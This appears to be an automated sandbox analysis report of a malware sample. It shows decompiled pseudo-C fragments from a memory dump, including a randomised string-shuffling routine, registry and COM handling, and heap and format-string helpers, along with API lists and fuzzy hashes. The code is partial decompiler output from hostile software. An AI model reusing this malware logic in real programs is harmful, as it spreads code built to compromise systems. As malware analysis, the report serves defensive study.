                                                          0x04475bbd
                                                          0x04475bbf
                                                          0x04475bcb
                                                          0x04475bcd
                                                          0x04475bcd
                                                          0x04475bd6
                                                          0x04475bdc
                                                          0x04475be1
                                                          0x04475bfb
                                                          0x04475c07
                                                          0x04475c09
                                                          0x04475c0e
                                                          0x04475c18
                                                          0x04475c18
                                                          0x04475c10
                                                          0x04475c10
                                                          0x04475c10
                                                          0x04475c10
                                                          0x04475c1f
                                                          0x04475c2c
                                                          0x04475c33
                                                          0x04475c38
                                                          0x04475c38
                                                          0x04475c40
                                                          0x04475c43
                                                          0x04475c69
                                                          0x04475c75
                                                          0x04475c7a
                                                          0x04475c7f
                                                          0x04475c81
                                                          0x04475cad
                                                          0x04475caf
                                                          0x04475c83
                                                          0x04475c87
                                                          0x04475c8c
                                                          0x04475c91
                                                          0x04475c98
                                                          0x04475c9e
                                                          0x04475ca3
                                                          0x04475ca9
                                                          0x04475cb0
                                                          0x04475cb2
                                                          0x04475cb4
                                                          0x04475cc3
                                                          0x04475cc9
                                                          0x04475cce
                                                          0x04475cd0
                                                          0x04475d00
                                                          0x04475d02
                                                          0x04475cd2
                                                          0x04475cd2
                                                          0x04475cd8
                                                          0x04475ce5
                                                          0x04475ceb
                                                          0x04475ceb
                                                          0x04475cf3
                                                          0x04475cfc
                                                          0x04475d03
                                                          0x04475d05
                                                          0x04475d07
                                                          0x04475d0e
                                                          0x04475d1b
                                                          0x04475d25
                                                          0x04475d27
                                                          0x04475d29
                                                          0x00000000
                                                          0x00000000
                                                          0x04475d2b
                                                          0x04475d30
                                                          0x04475d32
                                                          0x04475d39
                                                          0x04475d3d
                                                          0x04475d40
                                                          0x04475d55
                                                          0x04475d59
                                                          0x04475d5e
                                                          0x00000000
                                                          0x04475d5e
                                                          0x04475d42
                                                          0x04475d44
                                                          0x00000000
                                                          0x00000000
                                                          0x04475d4f
                                                          0x04475d51
                                                          0x04475d53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04475d53
                                                          0x04475d36
                                                          0x04475d36
                                                          0x04475d07
                                                          0x04475c45
                                                          0x04475c45
                                                          0x04475c4a
                                                          0x04475d60
                                                          0x04475d64
                                                          0x04475d6c
                                                          0x04475d6c
                                                          0x00000000
                                                          0x04475d64
                                                          0x04475c50
                                                          0x04475c53
                                                          0x04475c5d
                                                          0x04475c64
                                                          0x00000000
                                                          0x04475d74
                                                          0x04475d74
                                                          0x04475d78
                                                          0x04475d7c
                                                          0x04475d7c

                                                          APIs
                                                            • Part of subcall function 04476C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,04475BBB,00000000,00000000), ref: 04476C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04475C38
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • memset.NTDLL ref: 04475C87
                                                          • RtlInitializeCriticalSection.NTDLL(05019570), ref: 04475C98
                                                            • Part of subcall function 04471C66: memset.NTDLL ref: 04471C7B
                                                            • Part of subcall function 04471C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04471CBD
                                                            • Part of subcall function 04471C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04471CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04475CC3
                                                          • wsprintfA.USER32 ref: 04475CF3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: e08877226bfc199699d6e213dbd4c5db1fd2e6f96e79646764c83d334cd101b6
                                                          • Instruction ID: 1222e8d431c16d7b09fdbb17de1cff0d8c40a5e5df25cd8a6c2f4540fa09fab1
                                                          • Opcode Fuzzy Hash: e08877226bfc199699d6e213dbd4c5db1fd2e6f96e79646764c83d334cd101b6
                                                          • Instruction Fuzzy Hash: 0351A4B1E10218BBFF21ABA5D848BDF77A8EB04744F148457E601EB641E678B9478B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 044762DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 22%
                                                          			E044762DA(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E0447A71F(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E0447A734(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E0447A71F((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x447d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                          0x044762e1
                                                          0x044762e8
                                                          0x044762ed
                                                          0x044762f0
                                                          0x044762f7
                                                          0x044762fa
                                                          0x044762fd
                                                          0x04476302
                                                          0x04476307
                                                          0x0447645b
                                                          0x0447645d
                                                          0x0447645f
                                                          0x04476464
                                                          0x04476464
                                                          0x0447630d
                                                          0x04476310
                                                          0x04476313
                                                          0x04476315
                                                          0x04476315
                                                          0x04476319
                                                          0x00000000
                                                          0x00000000
                                                          0x0447631d
                                                          0x04476349
                                                          0x0447634e
                                                          0x04476350
                                                          0x04476350
                                                          0x04476353
                                                          0x04476356
                                                          0x04476356
                                                          0x04476358
                                                          0x00000000
                                                          0x04476323
                                                          0x04476325
                                                          0x04476344
                                                          0x04476344
                                                          0x0447635b
                                                          0x0447635b
                                                          0x0447635c
                                                          0x0447635c
                                                          0x0447635f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0447635f
                                                          0x04476329
                                                          0x04476370
                                                          0x04476374
                                                          0x0447644e
                                                          0x04476450
                                                          0x04476450
                                                          0x04476451
                                                          0x04476454
                                                          0x00000000
                                                          0x04476454
                                                          0x0447637d
                                                          0x0447638e
                                                          0x04476392
                                                          0x0447644a
                                                          0x00000000
                                                          0x0447644a
                                                          0x04476398
                                                          0x0447639b
                                                          0x0447639f
                                                          0x044763a3
                                                          0x044763a8
                                                          0x04476440
                                                          0x04476440
                                                          0x00000000
                                                          0x04476446
                                                          0x044763b3
                                                          0x044763bc
                                                          0x044763d0
                                                          0x044763d7
                                                          0x044763ec
                                                          0x044763f2
                                                          0x044763fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x044763fc
                                                          0x044763fc
                                                          0x044763fc
                                                          0x04476403
                                                          0x0447640b
                                                          0x00000000
                                                          0x00000000
                                                          0x0447640d
                                                          0x04476416
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04476418
                                                          0x0447641a
                                                          0x0447641d
                                                          0x0447641d
                                                          0x04476420
                                                          0x04476424
                                                          0x04476427
                                                          0x0447642d
                                                          0x04476430
                                                          0x04476437
                                                          0x00000000
                                                          0x044763b3
                                                          0x0447632e
                                                          0x04476336
                                                          0x0447633c
                                                          0x0447633e
                                                          0x0447633e
                                                          0x04476341
                                                          0x04476343
                                                          0x00000000
                                                          0x04476343
                                                          0x0447631d
                                                          0x04476363
                                                          0x04476368
                                                          0x0447636a
                                                          0x0447636a
                                                          0x0447636d
                                                          0x0447636d
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 044763D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 044763EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04476403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 04476427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 0b88685388253bcb34e5d20eea65da3842f55fcd9638bb2b421d734f272ecc4f
                                                          • Instruction ID: f5181c24548ac0bec99012f3b42713f44b24da14d92921fe672175e9e4e2eef1
                                                          • Opcode Fuzzy Hash: 0b88685388253bcb34e5d20eea65da3842f55fcd9638bb2b421d734f272ecc4f
                                                          • Instruction Fuzzy Hash: 41518171A00518EBDF25CF99C4856EEBBB7FF45324F16805BE915AB201CB70AA53CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04476545, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E04476545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E0447A71F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                          0x04476551
                                                          0x04476555
                                                          0x04476556
                                                          0x04476557
                                                          0x04476559
                                                          0x0447655b
                                                          0x0447655e
                                                          0x04476563
                                                          0x044765fa
                                                          0x04476601
                                                          0x04476601
                                                          0x0447656c
                                                          0x04476573
                                                          0x04476583
                                                          0x04476583
                                                          0x04476589
                                                          0x0447658b
                                                          0x04476590
                                                          0x04476599
                                                          0x0447659f
                                                          0x044765a4
                                                          0x044765af
                                                          0x044765b3
                                                          0x044765b5
                                                          0x044765b6
                                                          0x044765bf
                                                          0x044765c3
                                                          0x044765d4
                                                          0x044765c5
                                                          0x044765ca
                                                          0x044765cf
                                                          0x044765de
                                                          0x044765de
                                                          0x044765b3
                                                          0x044765e4
                                                          0x044765ea
                                                          0x044765ea
                                                          0x044765f3
                                                          0x044765f8
                                                          0x044765f8
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 1b57a743befc1eae88b0b0b673bc80c5088d88c61e983bb45c7e93e0fe830b05
                                                          • Instruction ID: 2f30fa8c1de2ce90c82c09410ab9294ccf5d43f0c57c62ca12cad7e2ab50a913
                                                          • Opcode Fuzzy Hash: 1b57a743befc1eae88b0b0b673bc80c5088d88c61e983bb45c7e93e0fe830b05
                                                          • Instruction Fuzzy Hash: 35217175900609EFDF11DFA8D9849DEBBB5FF48314B1141AAE902E7304EB30EA06DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04478D14, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04478D14(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E0447A2F9(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x447d2a8; // 0xb9a5a8
				_t4 = _t24 + 0x447edc0; // 0x5019368
				_t5 = _t24 + 0x447ed68; // 0x4f0053
				_t45 = E04475356( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x447d2a8; // 0xb9a5a8
						_t11 = _t32 + 0x447edb4; // 0x501935c
						_t48 = _t11;
						_t12 = _t32 + 0x447ed68; // 0x4f0053
						_t52 = E044745C6(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x447d2a8; // 0xb9a5a8
							_t13 = _t35 + 0x447edfe; // 0x30314549
							if(E04478E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x447d25c - 6;
								if( *0x447d25c <= 6) {
									_t42 =  *0x447d2a8; // 0xb9a5a8
									_t15 = _t42 + 0x447ec0a; // 0x52384549
									E04478E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x447d2a8; // 0xb9a5a8
							_t17 = _t38 + 0x447edf8; // 0x50193a0
							_t18 = _t38 + 0x447edd0; // 0x680043
							_t40 = E04475D7D(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x447d238, 0, _t52);
						}
					}
					HeapFree( *0x447d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04474F14(_t54);
				}
				return _t45;
			}


















                                                          0x04478d14
                                                          0x04478d24
                                                          0x04478d27
                                                          0x04478d2e
                                                          0x04478d30
                                                          0x04478d30
                                                          0x04478d33
                                                          0x04478d38
                                                          0x04478d3f
                                                          0x04478d51
                                                          0x04478d55
                                                          0x04478d63
                                                          0x04478d71
                                                          0x04478d75
                                                          0x04478e06
                                                          0x04478e06
                                                          0x04478d7b
                                                          0x04478d7b
                                                          0x04478d80
                                                          0x04478d80
                                                          0x04478d87
                                                          0x04478d93
                                                          0x04478d95
                                                          0x04478d97
                                                          0x04478d99
                                                          0x04478da0
                                                          0x04478db2
                                                          0x04478db4
                                                          0x04478dbb
                                                          0x04478dbd
                                                          0x04478dc4
                                                          0x04478dcf
                                                          0x04478dcf
                                                          0x04478dbb
                                                          0x04478dd4
                                                          0x04478dd9
                                                          0x04478de0
                                                          0x04478df0
                                                          0x04478dfe
                                                          0x04478e00
                                                          0x04478e00
                                                          0x04478d97
                                                          0x04478e12
                                                          0x04478e12
                                                          0x04478e14
                                                          0x04478e19
                                                          0x04478e1b
                                                          0x04478e1b
                                                          0x04478e26

                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05019368,00000000,?,74B5F710,00000000,74B5F730), ref: 04478D63
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050193A0,?,00000000,30314549,00000014,004F0053,0501935C), ref: 04478E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0447523E), ref: 04478E12
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 4ea4c79c912e3e9fd8988b661dfbcf4337a278d318a5b7ffc723eeb71d124b9c
                                                          • Instruction ID: 6cfd0f9cfb4565142552e0e2856dcd97f0986af62150ebc96c91fd36f84bc12b
                                                          • Opcode Fuzzy Hash: 4ea4c79c912e3e9fd8988b661dfbcf4337a278d318a5b7ffc723eeb71d124b9c
                                                          • Instruction Fuzzy Hash: 8031A171900109BFFF20EB90DD48DDABBBDEF44704F1441AAA600AB121E770AE47CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0447A376, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E0447A376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t25;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x447d340; // 0x5019a88
				_push(0x800);
				_push(0);
				_push( *0x447d238);
				if( *0x447d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x447d24c =  *0x447d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04477306(_t44, _t40);
						_t18 = E04474A09(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x447d24c < 5) {
								 *0x447d24c =  *0x447d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E04476761();
						RtlFreeHeap( *0x447d238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E04471F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				_t25 = RtlAllocateHeap(); // executed
				if(_t25 == 0) {
					goto L6;
				}
				_t24 = E04474AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}












                                                          0x0447a376
                                                          0x0447a376
                                                          0x0447a379
                                                          0x0447a37a
                                                          0x0447a384
                                                          0x0447a38b
                                                          0x0447a390
                                                          0x0447a392
                                                          0x0447a398
                                                          0x0447a3c0
                                                          0x0447a3d8
                                                          0x0447a3da
                                                          0x0447a3db
                                                          0x0447a3dd
                                                          0x0447a41b
                                                          0x0447a41b
                                                          0x0447a421
                                                          0x0447a427
                                                          0x0447a427
                                                          0x0447a3df
                                                          0x0447a3e5
                                                          0x0447a3e8
                                                          0x0447a3f7
                                                          0x0447a3f9
                                                          0x0447a400
                                                          0x0447a434
                                                          0x0447a439
                                                          0x0447a43b
                                                          0x0447a43d
                                                          0x0447a43d
                                                          0x00000000
                                                          0x0447a43b
                                                          0x0447a402
                                                          0x0447a407
                                                          0x0447a415
                                                          0x00000000
                                                          0x0447a415
                                                          0x0447a3cf
                                                          0x0447a3d4
                                                          0x0447a3d4
                                                          0x00000000
                                                          0x0447a3d4
                                                          0x0447a39a
                                                          0x0447a3a2
                                                          0x00000000
                                                          0x00000000
                                                          0x0447a3b1
                                                          0x00000000

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0447A39A
                                                            • Part of subcall function 04474AB6: GetTickCount.KERNEL32 ref: 04474ACA
                                                            • Part of subcall function 04474AB6: wsprintfA.USER32 ref: 04474B1A
                                                            • Part of subcall function 04474AB6: wsprintfA.USER32 ref: 04474B37
                                                            • Part of subcall function 04474AB6: wsprintfA.USER32 ref: 04474B63
                                                            • Part of subcall function 04474AB6: HeapFree.KERNEL32(00000000,?), ref: 04474B75
                                                            • Part of subcall function 04474AB6: wsprintfA.USER32 ref: 04474B96
                                                            • Part of subcall function 04474AB6: HeapFree.KERNEL32(00000000,?), ref: 04474BA6
                                                            • Part of subcall function 04474AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04474BD4
                                                            • Part of subcall function 04474AB6: GetTickCount.KERNEL32 ref: 04474BE5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0447A3B8
                                                          • RtlFreeHeap.NTDLL(00000000,00000002,04475289,?,04475289,00000002,?,?,04475D5E,?), ref: 0447A415
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                          • String ID:
                                                          • API String ID: 1676223858-0
                                                          • Opcode ID: 08e5b8abf93c8780e325b60bdda3f92abb84d53dcd7b659b1ab0f0e78dbf9240
                                                          • Instruction ID: 77a97f537eb91162e6d4f210b6c7154320832a7b3c47fd0950135135326945d7
                                                          • Opcode Fuzzy Hash: 08e5b8abf93c8780e325b60bdda3f92abb84d53dcd7b659b1ab0f0e78dbf9240
                                                          • Instruction Fuzzy Hash: D2213CB1610214EBEB119F99D884AEE77ACEF44345F104026FA01EB250EB74AD479BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0447219B, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E0447219B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t76 = E04473AB0(_v8, _a8, _a12, _a20,  &_a20,  &_a12);
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x447d2a8; // 0xb9a5a8
						_t20 = _t68 + 0x447e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E044757B4(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}




















                                                          0x044721a1
                                                          0x044721a4
                                                          0x044721b4
                                                          0x044721bd
                                                          0x044721c1
                                                          0x0447228f
                                                          0x04472295
                                                          0x04472295
                                                          0x044721e0
                                                          0x044721e4
                                                          0x044721ea
                                                          0x044721ef
                                                          0x044721f6
                                                          0x04472205
                                                          0x04472205
                                                          0x04472209
                                                          0x0447220b
                                                          0x04472217
                                                          0x04472222
                                                          0x0447222d
                                                          0x04472231
                                                          0x0447223b
                                                          0x0447223f
                                                          0x04472241
                                                          0x04472246
                                                          0x0447224d
                                                          0x0447225d
                                                          0x0447225d
                                                          0x04472246
                                                          0x0447223f
                                                          0x0447225f
                                                          0x04472264
                                                          0x04472269
                                                          0x04472269
                                                          0x0447226c
                                                          0x04472275
                                                          0x0447227a
                                                          0x0447227a
                                                          0x0447227f
                                                          0x04472284
                                                          0x04472284
                                                          0x0447227f
                                                          0x04472209
                                                          0x04472286
                                                          0x0447228c
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 04473AB0: SysAllocString.OLEAUT32(80000002), ref: 04473B0D
                                                            • Part of subcall function 04473AB0: SysFreeString.OLEAUT32(00000000), ref: 04473B73
                                                          • SysFreeString.OLEAUT32(?), ref: 0447227A
                                                          • SysFreeString.OLEAUT32(044785ED), ref: 04472284
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
